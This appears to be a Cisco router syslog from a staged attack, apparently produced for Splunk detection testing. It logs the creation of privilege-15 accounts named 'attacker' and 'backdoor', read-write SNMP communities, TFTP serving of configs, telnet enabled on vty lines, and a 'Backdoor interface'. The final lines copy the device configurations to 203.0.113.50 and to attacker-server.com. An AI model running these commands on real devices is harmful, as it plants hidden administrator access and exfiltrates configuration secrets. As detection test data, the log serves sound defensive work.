Aug 20 21:46:10 52.53.165.221 197: 000192: *Aug 20 21:46:08.890 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user 'ec2-user' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:46:09 52.53.165.221 196: 000191: *Aug 20 21:46:08.890 UTC: %SYS-6-LOGOUT: User ec2-user has exited tty session 434(76.154.218.105)
Aug 20 21:46:09 52.53.165.221 195: 000190: *Aug 20 21:46:08.890 UTC: %SYS-6-TTY_EXPIRE_TIMER: (exec timer expired, tty 434 (76.154.218.105)), user ec2-user
Aug 20 21:35:46 52.53.165.221 194: 000189: *Aug 20 21:35:44.567 UTC: %SSH-5-SSH2_USERAUTH: User 'ec2-user' authentication for SSH2 Session from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:35:45 52.53.165.221 193: 000188: *Aug 20 21:35:44.567 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: ec2-user] [Source: 76.154.218.105] [localport: 22] at 21:35:44 UTC Wed Aug 20 2025
Aug 20 21:35:45 52.53.165.221 192: 000187: *Aug 20 21:35:44.566 UTC: %SSH-5-SSH_COMPLIANCE_VIOLATION_PK_ALGO: SSH Public-key Algorithm compliance violation detected.Kindly note that weaker Public-key Algorithm 'ssh-rsa' will be disabled by-default in the upcoming releases.Please configure more stronger PK algorithms to avoid service impact.
Aug 20 21:35:45 52.53.165.221 191: 000186: *Aug 20 21:35:44.247 UTC: %SSH-5-SSH2_SESSION: SSH2 Session request from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:35:42 52.53.165.221 190: 000185: *Aug 20 21:35:40.766 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user '' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:35:42 52.53.165.221 189: 000184: *Aug 20 21:35:40.766 UTC: %SSH-5-SSH2_USERAUTH: User '' authentication for SSH2 Session from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Failed
Aug 20 21:35:25 52.53.165.221 188: 000183: *Aug 20 21:35:23.994 UTC: %SSH-5-SSH2_SESSION: SSH2 Session request from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:35:12 52.53.165.221 187: 000182: *Aug 20 21:35:11.369 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user 'ec2-user' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:35:11 52.53.165.221 186: 000181: *Aug 20 21:35:11.369 UTC: %SYS-6-LOGOUT: User ec2-user has exited tty session 434(76.154.218.105)
Aug 20 21:35:11 52.53.165.221 185: 000180: *Aug 20 21:35:10.120 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:35:03 52.53.165.221 184: 000179: *Aug 20 21:35:01.493 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:exit
Aug 20 21:34:54 52.53.165.221 183: 000178: *Aug 20 21:34:52.740 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:line console 0
Aug 20 21:34:50 52.53.165.221 182: 000177: *Aug 20 21:34:49.209 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:exit
Aug 20 21:34:47 52.53.165.221 181: 000176: *Aug 20 21:34:46.395 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:transport input ssh telnet
Aug 20 21:34:39 52.53.165.221 180: 000175: *Aug 20 21:34:38.090 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:line vty 0 15
Aug 20 21:34:33 52.53.165.221 179: 000174: *Aug 20 21:34:32.382 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:tftp-server bootflash:info
Aug 20 21:34:29 52.53.165.221 178: 000173: *Aug 20 21:34:28.358 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:tftp-server system:running-config
Aug 20 21:34:22 52.53.165.221 177: 000172: *Aug 20 21:34:20.714 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:tftp-server bootflash:running-config
Aug 20 21:34:16 52.53.165.221 176: 000171: *Aug 20 21:34:14.949 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:snmp-server host 203.0.113.50 *
Aug 20 21:34:12 52.53.165.221 175: 000170: *Aug 20 21:34:11.011 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:snmp-server community * rw
Aug 20 21:34:09 52.53.165.221 174: 000169: *Aug 20 21:34:07.691 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:snmp-server community * rw
Aug 20 21:34:05 52.53.165.221 173: 000168: *Aug 20 21:34:03.778 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:snmp-server community * ro
Aug 20 21:33:59 52.53.165.221 172: 000167: *Aug 20 21:33:58.104 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:exit
Aug 20 21:33:56 52.53.165.221 171: 000166: *Aug 20 21:33:55.322 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:ip address 192.168.100.1 255.255.255.0
Aug 20 21:33:52 52.53.165.221 170: 000165: *Aug 20 21:33:51.387 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:description Backdoor interface
Aug 20 21:33:49 52.53.165.221 169: 000164: *Aug 20 21:33:48.040 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:interface Loopback200
Aug 20 21:33:48 52.53.165.221 168: 000163: *Aug 20 21:33:48.038 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback200, changed state to up
Aug 20 21:33:44 52.53.165.221 167: 000162: *Aug 20 21:33:43.072 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:exit
Aug 20 21:33:42 52.53.165.221 166: 000161: *Aug 20 21:33:40.849 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:ip address 10.10.10.1 255.255.255.0
Aug 20 21:33:37 52.53.165.221 165: 000160: *Aug 20 21:33:35.987 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:description Attacker test interface
Aug 20 21:33:33 52.53.165.221 164: 000159: *Aug 20 21:33:32.153 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:interface Loopback100
Aug 20 21:33:32 52.53.165.221 163: 000158: *Aug 20 21:33:32.152 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback100, changed state to up
Aug 20 21:33:23 52.53.165.221 162: 000157: *Aug 20 21:33:22.072 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:33:21 52.53.165.221 161: 000156: *Aug 20 21:33:20.307 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:!config: USER TABLE MODIFIED
Aug 20 21:33:21 52.53.165.221 160: 000155: *Aug 20 21:33:20.307 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:username service privilege 15 secret *
Aug 20 21:33:20 52.53.165.221 159: 000154: *Aug 20 21:33:20.306 UTC: %AAA-6-USER_PRIVILEGE_UPDATE: username: service privilege updated with priv-15
Aug 20 21:33:20 52.53.165.221 158: 000153: *Aug 20 21:33:20.281 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: service configured
Aug 20 21:32:11 52.53.165.221 157: 000152: *Aug 20 21:32:09.629 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:31:43 52.53.165.221 156: 000151: *Aug 20 21:31:42.330 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:snmp-server community * rw
Aug 20 21:31:40 52.53.165.221 155: 000150: *Aug 20 21:31:38.543 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:tftp-server nvram:startup-config
Aug 20 21:31:36 52.53.165.221 154: 000149: *Aug 20 21:31:35.240 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:!config: USER TABLE MODIFIED
Aug 20 21:31:36 52.53.165.221 153: 000148: *Aug 20 21:31:35.240 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:username backdoor password 0 *
Aug 20 21:31:35 52.53.165.221 152: 000147: *Aug 20 21:31:35.240 UTC: %AAAA-4-CLI_DEPRECATED: WARNING: Command has been added to the configuration using a type 0 password. However, recommended to migrate to strong type-6 encryption
Aug 20 21:31:35 52.53.165.221 151: 000146: *Aug 20 21:31:35.240 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: backdoor configured
Aug 20 21:31:31 52.53.165.221 150: 000145: *Aug 20 21:31:30.331 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:!config: USER TABLE MODIFIED
Aug 20 21:31:31 52.53.165.221 149: 000144: *Aug 20 21:31:30.331 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:username attacker privilege 15 secret *
Aug 20 21:31:30 52.53.165.221 148: 000143: *Aug 20 21:31:30.330 UTC: %AAA-6-USER_PRIVILEGE_UPDATE: username: attacker privilege updated with priv-15
Aug 20 21:31:30 52.53.165.221 147: 000142: *Aug 20 21:31:30.305 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: attacker configured
Aug 20 21:21:15 52.53.165.221 146: 000141: *Aug 20 21:21:14.360 UTC: %SSH-5-SSH2_USERAUTH: User 'ec2-user' authentication for SSH2 Session from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:21:14 52.53.165.221 145: 000140: *Aug 20 21:21:14.360 UTC: %SEC_LOGIN-5-LOGIN_SUCCESS: Login Success [user: ec2-user] [Source: 76.154.218.105] [localport: 22] at 21:21:14 UTC Wed Aug 20 2025
Aug 20 21:21:14 52.53.165.221 144: 000139: *Aug 20 21:21:14.358 UTC: %SSH-5-SSH_COMPLIANCE_VIOLATION_PK_ALGO: SSH Public-key Algorithm compliance violation detected.Kindly note that weaker Public-key Algorithm 'ssh-rsa' will be disabled by-default in the upcoming releases.Please configure more stronger PK algorithms to avoid service impact.
Aug 20 21:21:14 52.53.165.221 143: 000138: *Aug 20 21:21:14.052 UTC: %SSH-5-SSH2_SESSION: SSH2 Session request from 76.154.218.105 (tty = 0) using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' Succeeded
Aug 20 21:16:05 52.53.165.221 142: 000137: *Aug 20 21:16:04.367 UTC: %SSH-5-SSH2_CLOSE: SSH2 Session from 76.154.218.105 (tty = 0) for user 'ec2-user' using crypto cipher 'aes128-gcm@openssh.com', hmac 'hmac-sha2-256-etm@openssh.com' closed
Aug 20 21:16:04 52.53.165.221 141: 000136: *Aug 20 21:16:04.367 UTC: %SYS-6-LOGOUT: User ec2-user has exited tty session 434(76.154.218.105)
Aug 20 21:16:04 52.53.165.221 140: 000135: *Aug 20 21:16:04.367 UTC: %SYS-6-TTY_EXPIRE_TIMER: (exec timer expired, tty 434 (76.154.218.105)), user ec2-user
Aug 20 21:02:51 52.53.165.221 139: 000134: *Aug 20 21:02:50.148 UTC: %LINK-5-CHANGED: Interface Loopback999, changed state to administratively down
Aug 20 21:02:51 52.53.165.221 138: 000133: *Aug 20 21:02:50.148 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback999, changed state to down
Aug 20 21:02:50 52.53.165.221 137: 000132: *Aug 20 21:02:49.860 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty0 (76.154.218.105)
Aug 20 21:02:49 52.53.165.221 136: 000131: *Aug 20 21:02:48.151 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:no interface Loopback999
Aug 20 21:02:44 52.53.165.221 135: 000130: *Aug 20 21:02:42.816 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:description Testing Splunk logging
Aug 20 21:02:43 52.53.165.221 134: 000129: *Aug 20 21:02:41.913 UTC: %LINK-3-UPDOWN: Interface Loopback999, changed state to up
Aug 20 21:02:42 52.53.165.221 133: 000128: *Aug 20 21:02:41.912 UTC: %LINEPROTO-5-UPDOWN: Line protocol on Interface Loopback999, changed state to up
Aug 20 21:02:41 52.53.165.221 132: 000127: *Aug 20 21:02:39.915 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:interface Loopback999
Aug 20 21:02:38 52.53.165.221 131: 000126: *Aug 20 21:02:37.189 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:no username test-splunk
Aug 20 21:02:33 52.53.165.221 130: 000125: *Aug 20 21:02:31.747 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:!config: USER TABLE MODIFIED
Aug 20 21:02:33 52.53.165.221 129: 000124: *Aug 20 21:02:31.747 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:username test-splunk privilege 15 secret *
Aug 20 21:02:32 52.53.165.221 128: 000123: *Aug 20 21:02:31.746 UTC: %AAA-6-USER_PRIVILEGE_UPDATE: username: test-splunk privilege updated with priv-15
Aug 20 21:02:32 52.53.165.221 127: 000122: *Aug 20 21:02:31.721 UTC: %AAA-6-USERNAME_CONFIGURATION: user with username: test-splunk configured
Aug 20 21:30:17 52.53.165.221 126: 000121: *Aug 20 21:30:17.147 UTC: %SYS-5-CONFIG_I: Configured from console by ec2-user on vty1 (76.154.218.105)
Aug 20 21:30:17 52.53.165.221 125: 000120: *Aug 20 21:30:17.147 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:copy startup-config tftp://203.0.113.50/stolen-config.txt
Aug 20 21:30:18 52.53.165.221 124: 000119: *Aug 20 21:30:18.123 UTC: %PARSER-5-CFGLOG_LOGGEDCMD: User:ec2-user logged command:copy running-config tftp://attacker-server.com/device-config.txt